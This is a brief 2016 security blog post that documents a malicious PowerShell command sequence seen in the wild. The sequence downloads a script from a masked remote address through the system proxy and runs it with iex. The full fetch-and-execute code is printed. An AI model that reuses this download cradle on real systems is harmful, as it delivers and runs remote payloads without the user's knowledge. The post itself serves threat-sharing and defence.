Wednesday, August 31, 2016

Malicious Powershell executing downloaded scripts

Interesting Powershell commands. Appears to download a list of Powershell commands, join them together, and execute them.

$web=new-object system.net.webclient;
$web.proxy = [syste.net.webrequest]::defaultwebproxy;
$web.proxy.credentials = [system.net.credentialcache]::defaultnetworkcredentials;
char[]$x=([char[]]($web.downloadstring("http://X.X.X.X/file.asp")));
iex ($x-join)

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Posted by at
Labels:

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)